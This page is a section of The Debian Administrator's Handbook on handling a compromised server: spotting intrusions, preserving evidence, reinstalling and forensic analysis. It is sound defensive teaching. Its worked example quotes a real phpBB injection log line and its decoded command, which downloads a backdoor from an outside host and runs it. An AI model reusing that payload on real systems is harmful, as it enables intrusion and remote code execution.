<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title xmlns:d="http://docbook.org/ns/docbook">14.7. Dealing with a Compromised Machine</title><link rel="stylesheet" type="text/css" href="Common_Content/css/default.css" /><link rel="stylesheet" media="print" href="Common_Content/css/print.css" type="text/css" /><meta xmlns:d="http://docbook.org/ns/docbook" name="generator" content="publican v4.3.2" /><meta xmlns:d="http://docbook.org/ns/docbook" name="package" content="Debian-debian-handbook-8-en-US-1.0-1" /><meta name="keywords" content="Firewall, Netfilter, IDS/NIDS" /><link rel="home" href="index.html" title="The Debian Administrator's Handbook" /><link rel="up" href="security.html" title="Chapter 14. Security" /><link rel="prev" href="sect.other-security-considerations.html" title="14.6. Other Security-Related Considerations" /><link rel="next" href="debian-packaging.html" title="Chapter 15. Creating a Debian Package" /><meta xmlns="" name="flattr:id" content="4pz9jq" /><link xmlns="" rel="canonical" href="https://debian-handbook.info/browse/stable/sect.dealing-with-compromised-machine.html" /></head><body><div id="banner"><a href="http://debian-handbook.info/get/"><span class="text">Download the ebook</span></a></div><p id="title"><a class="left" href="http://www.debian.org"><img alt="Product Site" src="Common_Content/images//image_left.png" /></a><a class="right" href="index.html"><img alt="Documentation Site" src="Common_Content/images//image_right.png" /></a></p><ul class="docnav top"><li class="previous"><a accesskey="p" href="sect.other-security-considerations.html"><strong>Prev</strong></a></li><li class="home">The Debian Administrator's Handbook</li><li class="next"><a accesskey="n" href="debian-packaging.html"><strong>Next</strong></a></li></ul><div class="section"><div class="titlepage"><div><div><h2 class="title"><a xmlns="" id="sect.dealing-with-compromised-machine"></a>14.7. Dealing with a Compromised Machine</h2></div></div></div><div class="para">
			Despite the best intentions and however carefully designed the security policy, an administrator eventually faces an act of hijacking. This section provides a few guidelines on how to react when confronted with these unfortunate circumstances.
		</div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a xmlns="" id="id-1.17.10.3"></a>14.7.1. Detecting and Seeing the Cracker's Intrusion</h3></div></div></div><div class="para">
				The first step of reacting to cracking is to be aware of such an act. This is not self-evident, especially without an adequate monitoring infrastructure.
			</div><div class="para">
				Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance one named <code class="literal">apache</code> instead of the standard <code class="literal">/usr/sbin/apache2</code>. If we follow that example, the thing to do is to note its process identifier, and check <code class="filename">/proc/<em class="replaceable">pid</em>/exe</code> to see what program this process is currently running:
			</div><pre class="screen">
<code class="computeroutput"># </code><strong class="userinput"><code>ls -al /proc/3719/exe</code></strong>
<code class="computeroutput">lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -&gt; /var/tmp/.bash_httpd/psybnc</code>
</pre><div class="para">
				A program installed under <code class="filename">/var/tmp/</code> and running as the web server? No doubt left, the machine is compromised.
			</div><div class="para">
				This is only one example, but many other hints can ring the administrator's bell:
			</div><div xmlns:d="http://docbook.org/ns/docbook" class="itemizedlist"><ul><li class="listitem"><div class="para">
						an option to a command that no longer works; the version of the software that the command claims to be doesn't match the version that is supposed to be installed according to <code class="command">dpkg</code>;
					</div></li><li class="listitem"><div class="para">
						a command prompt or a session greeting indicating that the last connection came from an unknown server on another continent;
					</div></li><li class="listitem"><div class="para">
						errors caused by the <code class="filename">/tmp/</code> partition being full, which turned out to be full of illegal copies of movies;
					</div></li><li class="listitem"><div class="para">
						and so on.
					</div></li></ul></div></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a xmlns="" id="id-1.17.10.4"></a>14.7.2. Putting the Server Off-Line</h3></div></div></div><div class="para">
				In any but the most exotic cases, the cracking comes from the network, and the attacker needs a working network to reach their targets (access confidential data, share illegal files, hide their identity by using the machine as a relay, and so on). Unplugging the computer from the network will prevent the attacker from reaching these targets, if they haven't managed to do so yet.
			</div><div class="para">
				This may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it's usually a good idea to start by gathering some important information (see <a class="xref" href="sect.dealing-with-compromised-machine.html#sect.keeping-everything-that-could-be-used-as-evidence">Section 14.7.3, “Keeping Everything that Could Be Used as Evidence”</a>, <a class="xref" href="sect.dealing-with-compromised-machine.html#sect.forensic-analysis">Section 14.7.5, “Forensic Analysis”</a> and <a class="xref" href="sect.dealing-with-compromised-machine.html#sect.reconstituting-the-attack-scenario">Section 14.7.6, “Reconstituting the Attack Scenario”</a>), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but <code class="command">sshd</code>). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machines.
			</div></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a xmlns="" id="sect.keeping-everything-that-could-be-used-as-evidence"></a>14.7.3. Keeping Everything that Could Be Used as Evidence</h3></div></div></div><div class="para">
				Understanding the attack and/or engaging legal action against the attackers requires taking copies of all the important elements; this includes the contents of the hard disk, a list of all running processes, and a list of all open connections. The contents of the RAM could also be used, but it is rarely used in practice.
			</div><div class="para">
				In the heat of action, administrators are often tempted to perform many checks on the compromised machine; this is usually not a good idea. Every command is potentially subverted and can erase pieces of evidence. The checks should be restricted to the minimal set (<code class="command">netstat -tupan</code> for network connections, <code class="command">ps auxf</code> for a list of processes, <code class="command">ls -alR /proc/[0-9]*</code> for a little more information on running programs), and every performed check should carefully be written down.
			</div><div class="sidebar"><div class="titlepage"><div><div><p class="title"><strong><span class="emphasis"><em>CAUTION</em></span> Hot analysis</strong></p></div></div></div><div class="para">
				While it may seem tempting to analyze the system as it runs, especially when the server is not physically reachable, this is best avoided: quite simply you can't trust the programs currently installed on the compromised system. It's quite possible for a subverted <code class="command">ps</code> command to hide some processes, or for a subverted <code class="command">ls</code> to hide files; sometimes even the kernel is compromised!
			</div><div class="para">
				If such a hot analysis is still required, care should be taken to only use known-good programs. A good way to do that would be to have a rescue CD with pristine programs, or a read-only network share. However, even those countermeasures may not be enough if the kernel itself is compromised.
			</div></div><div class="para">
				Once the “dynamic” elements have been saved, the next step is to store a complete image of the hard-disk. Making such an image is impossible if the filesystem is still evolving, which is why it must be remounted read-only. The simplest solution is often to halt the server brutally (after running <code class="command">sync</code>) and reboot it on a rescue CD. Each partition should be copied with a tool such as <code class="command">dd</code>; these images can be sent to another server (possibly with the very convenient <code class="command">nc</code> tool). Another possibility may be even simpler: just get the disk out of the machine and replace it with a new one that can be reformatted and reinstalled.
			</div></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a xmlns="" id="id-1.17.10.6"></a>14.7.4. Re-installing</h3></div></div></div><a id="id-1.17.10.6.2" class="indexterm"></a><div class="para">
				The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we get rid of everything the attacker may have left behind (particularly <span class="emphasis"><em>backdoors</em></span>). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
			</div><div class="para">
				Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems. Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.
			</div></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a xmlns="" id="sect.forensic-analysis"></a>14.7.5. Forensic Analysis</h3></div></div></div><div class="para">
				Now that the service has been restored, it is time to have a closer look at the disk images of the compromised system in order to understand the attack vector. When mounting these images, care should be taken to use the <code class="literal">ro,nodev,noexec,noatime</code> options so as to avoid changing the contents (including timestamps of access to files) or running compromised programs by mistake.
			</div><div class="para">
				Retracing an attack scenario usually involves looking for everything that was modified and executed:
			</div><div xmlns:d="http://docbook.org/ns/docbook" class="itemizedlist"><ul><li class="listitem"><div class="para">
						<code class="filename">.bash_history</code> files often provide for a very interesting read;
					</div></li><li class="listitem"><div class="para">
						so does listing files that were recently created, modified or accessed;
					</div></li><li class="listitem"><div class="para">
						the <code class="command">strings</code> command helps identifying programs installed by the attacker, by extracting text strings from a binary;
					</div></li><li class="listitem"><div class="para">
						the log files in <code class="filename">/var/log/</code> often allow reconstructing a chronology of events;
					</div></li><li class="listitem"><div class="para">
						special-purpose tools also allow restoring the contents of potentially deleted files, including log files that attackers often delete.
					</div></li></ul></div><div class="para">
				Some of these operations can be made easier with specialized software. In particular, the <span class="pkg pkg">sleuthkit</span> package provides many tools to analyze a filesystem. Their use is made easier by the <span class="emphasis"><em>Autopsy Forensic Browser</em></span> graphical interface (in the <span class="pkg pkg">autopsy</span> package).
			</div><a id="id-1.17.10.7.6" class="indexterm"></a><a id="id-1.17.10.7.7" class="indexterm"></a></div><div class="section"><div class="titlepage"><div><div><h3 class="title"><a xmlns="" id="sect.reconstituting-the-attack-scenario"></a>14.7.6. Reconstituting the Attack Scenario</h3></div></div></div><div class="para">
				All the elements collected during the analysis should fit together like pieces in a jigsaw puzzle; the creation of the first suspect files is often correlated with logs proving the breach. A real-world example should be more explicit than long theoretical ramblings.
			</div><div class="para">
				The following log is an extract from an Apache <code class="filename">access.log</code>:
			</div><pre class="programlisting">
www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&amp;highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
</pre><div class="para">
				This example matches exploitation of an old security vulnerability in phpBB. <div xmlns="" class="url">→ <a xmlns="http://www.w3.org/1999/xhtml" href="http://secunia.com/advisories/13239/">http://secunia.com/advisories/13239/</a></div> <div xmlns="" class="url">→ <a xmlns="http://www.w3.org/1999/xhtml" href="http://www.phpbb.com/phpBB/viewtopic.php?t=240636">http://www.phpbb.com/phpBB/viewtopic.php?t=240636</a></div>
			</div><div class="para">
				Decoding this long URL leads to understanding that the attacker managed to run some PHP code, namely: <code class="command">system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &amp;")</code>. Indeed, a <code class="filename">bd</code> file was found in <code class="filename">/tmp/</code>. Running <code class="command">strings /mnt/tmp/bd</code> returns, among other strings, <code class="literal">PsychoPhobia Backdoor is starting...</code>. This really looks like a backdoor.
			</div><div class="para">
				Some time later, this access was used to download, install and run an IRC <span class="emphasis"><em>bot</em></span> that connected to an underground IRC network. The bot could then be controlled via this protocol and instructed to download files for sharing. This program even has its own log file:
			</div><pre class="programlisting">** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
** 2004-11-29-19:50:20: DCC CHAT Correct password
(...)
** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
(...)
** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
(...)
** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
(...)
** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
</pre><div class="para">
				These traces show that two video files have been stored on the server by way of the 82.50.72.202 IP address.
			</div><div class="para">
				In parallel, the attacker also downloaded a pair of extra files, <code class="filename">/tmp/pt</code> and <code class="filename">/tmp/loginx</code>. Running these files through <code class="command">strings</code> leads to strings such as <span class="foreignphrase"><em class="foreignphrase">Shellcode placed at 0x%08lx</em></span> and <span class="foreignphrase"><em class="foreignphrase">Now wait for suid shell...</em></span>. These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
			</div><div class="para">
				In this example, the whole intrusion has been reconstructed, and it can be deduced that the attacker has been able to take advantage of the compromised system for about three days; but the most important element in the analysis is that the vulnerability has been identified, and the administrator can be sure that the new installation really does fix the vulnerability.
			</div></div></div><ul class="docnav"><li class="previous"><a accesskey="p" href="sect.other-security-considerations.html"><strong>Prev</strong>14.6. Other Security-Related Considerations</a></li><li class="up"><a accesskey="u" href="#"><strong>Up</strong></a></li><li class="home"><a accesskey="h" href="index.html"><strong>Home</strong></a></li><li class="next"><a accesskey="n" href="debian-packaging.html"><strong>Next</strong>Chapter 15. Creating a Debian Package</a></li></ul></body></html>